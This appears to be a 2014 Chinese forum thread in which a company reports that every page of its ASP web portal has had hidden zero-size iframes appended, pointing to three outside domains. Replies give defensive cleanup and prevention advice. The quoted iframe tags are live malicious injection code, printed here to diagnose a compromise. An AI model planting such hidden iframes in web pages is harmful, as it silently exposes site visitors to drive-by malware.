日期:2014-05-17  浏览次数:20914 次

门户被黑,不知道是什么造成的
我们公司的门户是用asp写的,放在21cn的虚拟主机上面,现在每个文件后面都被加了
<iframe   src= "http://www.cqcqcqcq.com/cqcqcq/juzhen/4/index.htm "   width= "0 "   height= "0 "   scrolling= "no "   frameborder= "0 "> </iframe>
<iframe   src= "http://user.free.77169.net/cqplay/q/index.htm "   width= "0 "   height= "0 "   scrolling= "no "   frameborder= "0 "> </iframe>
<iframe   src=http://www.haogs.cn/html   width=100   height=0> </iframe>
代码。但是我查看了一下完整的代码也没发现有什么可以文件,不知道是为什么。有经验的朋友请告知,该如何处理和如何预防。谢谢

------解决方案--------------------
服務器中病毒了,這個病毒就是搜索硬盤的的目錄,查詢web格式的頁面,并在后面追加 <iframe> 標簽,大部分都是木馬所謂,而你的web頁面寫入這些東西后就相當于掛馬了,所以要小心的在服務器上殺毒,及時升級殺毒軟件,安裝防火墻。
------解决方案--------------------
如果是虚拟主机的话,有两种可能
第一是你的门户存在漏洞,这种情况建议你查看一下你的程序问题,这种问题你可以自已控制.
第二是虚拟主机的安全问题,即别人通过主机上的别的网站漏洞进入,这种问题你没有办法控制,建议你更换虚拟主机,采用正规服务商的虚拟主机.
------解决方案--------------------
看一下文件的最后更新时间,然后查看那天的IIS日志,看看有没有可疑的QUERY_STRING
------解决方案--------------------
我的站点也有出现了这样的问题,你查一下你 的站点上有没有一个*.asa的文件,这是一个木马病毒,那些人可以通过这个东西获得你的SVR-32的权限,也可以批量挂马。
哎,这之后,我里面用DLL调用DAT文件就一直不正常,不知道是不是木马的缘故。。。